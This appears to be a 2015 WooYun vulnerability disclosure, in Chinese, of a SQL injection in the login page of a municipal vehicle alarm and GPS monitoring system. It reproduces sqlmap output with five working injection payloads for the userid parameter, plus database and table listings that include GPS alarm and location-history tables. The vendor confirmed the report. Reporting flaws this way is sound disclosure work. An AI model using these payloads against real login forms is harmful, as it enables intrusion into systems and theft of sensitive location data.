当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101009

漏洞标题:某市敏感单位车辆报警监控系统SQL注入二

相关厂商:公安部一所

漏洞作者: YY-2012

提交时间:2015-03-13 14:38

修复时间:2015-04-27 14:40

公开时间:2015-04-27 14:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-13: 细节已通知厂商并且等待厂商处理中
2015-03-13: 厂商已经确认,细节仅向厂商公开
2015-03-23: 细节向核心白帽子及相关领域专家公开
2015-04-02: 细节向普通白帽子公开
2015-04-12: 细节向实习白帽子公开
2015-04-27: 细节向公众公开

简要描述:

rt

详细说明:

与上一个ip不同

mask 区域
*****^心GPS车辆^*****
1.http://**.**.**/


存在post注入
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 'admin'' 之前有未闭合的引号。
/logina.asp,行 15

漏洞证明:


sqlmap identified the following injection points with a total of 61 HTTP(s) requests:
---
Parameter: userid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: userid=admin' AND 7428=7428 AND 'BTOH'='BTOH&password=asd&I1.x=67&I1.y=12
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: userid=admin' AND 3479=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (3479=3479) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113))) AND 'DEYu'='DEYu&password=asd&I1.x=67&I1.y=12
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: userid=admin';WAITFOR DELAY '0:0:5'--&password=asd&I1.x=67&I1.y=12
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: userid=admin' WAITFOR DELAY '0:0:5'--&password=asd&I1.x=67&I1.y=12
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: userid=-3410' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(88)+CHAR(111)+CHAR(81)+CHAR(107)+CHAR(77)+CHAR(118)+CHAR(65)+CHAR(74)+CHAR(114)+CHAR(88)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113),NULL,NULL,NULL-- &password=asd&I1.x=67&I1.y=12
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: userid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: userid=admin' AND 7428=7428 AND 'BTOH'='BTOH&password=asd&I1.x=67&I1.y=12
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: userid=admin' AND 3479=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (3479=3479) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113))) AND 'DEYu'='DEYu&password=asd&I1.x=67&I1.y=12
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: userid=admin';WAITFOR DELAY '0:0:5'--&password=asd&I1.x=67&I1.y=12
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: userid=admin' WAITFOR DELAY '0:0:5'--&password=asd&I1.x=67&I1.y=12
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: userid=-3410' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(88)+CHAR(111)+CHAR(81)+CHAR(107)+CHAR(77)+CHAR(118)+CHAR(65)+CHAR(74)+CHAR(114)+CHAR(88)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113),NULL,NULL,NULL-- &password=asd&I1.x=67&I1.y=12
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: msdb
[82 tables]
+--------------------------------------------+
| RTblClassDefs |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_databases |
| log_shipping_monitor |
| log_shipping_plan_databases |
| log_shipping_plan_history |
| log_shipping_plans |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysconstraints |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysnotifications |
| sysoperators |
| syssegments |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
| systasks_view |
| systasks_view |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| authors |
| discounts |
| employee |
| jobs |
| pub_info |
| publishers |
| roysched |
| sales |
| stores |
| sysconstraints |
| syssegments |
| titleauthor |
| titles |
| titleview |
+--------------------------------------------+
Database: gpslog
[72 tables]
+--------------------------------------------+
| ALARMMSG200904 |
| ALARMMSG200905 |
| ALARMMSG200906 |
| ALARMMSG200907 |
| ALARMMSG201210 |
| ALARMMSG201211 |
| ALARMMSG201212 |
| ALARMMSG201301 |
| ALARMMSG201302 |
| ALARMMSG201303 |
| ALARMMSG201304 |
| ALARMMSG201305 |
| ALARMMSG201306 |
| ALARMMSG201307 |
| ALARMMSG201308 |
| ALARMMSG201309 |
| ALARMMSG201310 |
| ALARMMSG201311 |
| ALARMMSG201312 |
| ALARMMSG201401 |
| ALARMMSG201402 |
| ALARMMSG201403 |
| ALARMMSG201405 |
| ALARMMSG201406 |
| ALARMMSG201407 |
| ALARMMSG201408 |
| ALARMMSG201409 |
| ALARMMSG201410 |
| ALARMMSG201411 |
| ALARMMSG201412 |
| ALARMMSG201501 |
| ALARMMSG201502 |
| ALARMMSG201503 |
| ALARMMSG201504 |
| HISTORYINFO200904 |
| HISTORYINFO200905 |
| HISTORYINFO200906 |
| HISTORYINFO200907 |
| HISTORYINFO201210 |
| HISTORYINFO201211 |
| HISTORYINFO201212 |
| HISTORYINFO201301 |
| HISTORYINFO201302 |
| HISTORYINFO201303 |
| HISTORYINFO201304 |
| HISTORYINFO201305 |
| HISTORYINFO201306 |
| HISTORYINFO201307 |
| HISTORYINFO201308 |
| HISTORYINFO201309 |
| HISTORYINFO201310 |
| HISTORYINFO201311 |
| HISTORYINFO201312 |
| HISTORYINFO201401 |
| HISTORYINFO201402 |
| HISTORYINFO201403 |
| HISTORYINFO201405 |
| HISTORYINFO201406 |
| HISTORYINFO201407 |
| HISTORYINFO201408 |
| HISTORYINFO201409 |
| HISTORYINFO201410 |
| HISTORYINFO201411 |
| HISTORYINFO201412 |
| HISTORYINFO201501 |
| HISTORYINFO201502 |
| HISTORYINFO201503 |
| HISTORYINFO201504 |
| dtproperties |
| mt_info |
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_datatype_info_ext |
| spt_datatype_info_ext |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_provider_types |
| spt_server_info |
| spt_values |
| sysconstraints |
| syslogins |
| sysoledbusers |
| sysopentapes |
| sysremotelogins |
| syssegments |
+--------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Invoices |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Alphabetical list of products |
| Category Sales for 1997 |
| Current Product List |
| Customer and Suppliers by City |
| Order Details Extended |
| Order Details Extended |
| Order Subtotals |
| Orders Qry |
| Orders Qry |
| Product Sales for 1997 |
| Products Above Average Price |
| Products Above Average Price |
| Products by Category |
| Quarterly Orders |
| Sales Totals by Amount |
| Sales by Category |
| Summary of Sales by Quarter |
| Summary of Sales by Year |
| sysconstraints |
| syssegments |
+--------------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-13 15:30

厂商回复:

验证确认存在所描述的问题,已通知其修复。

最新状态:

暂无


漏洞评价:

评论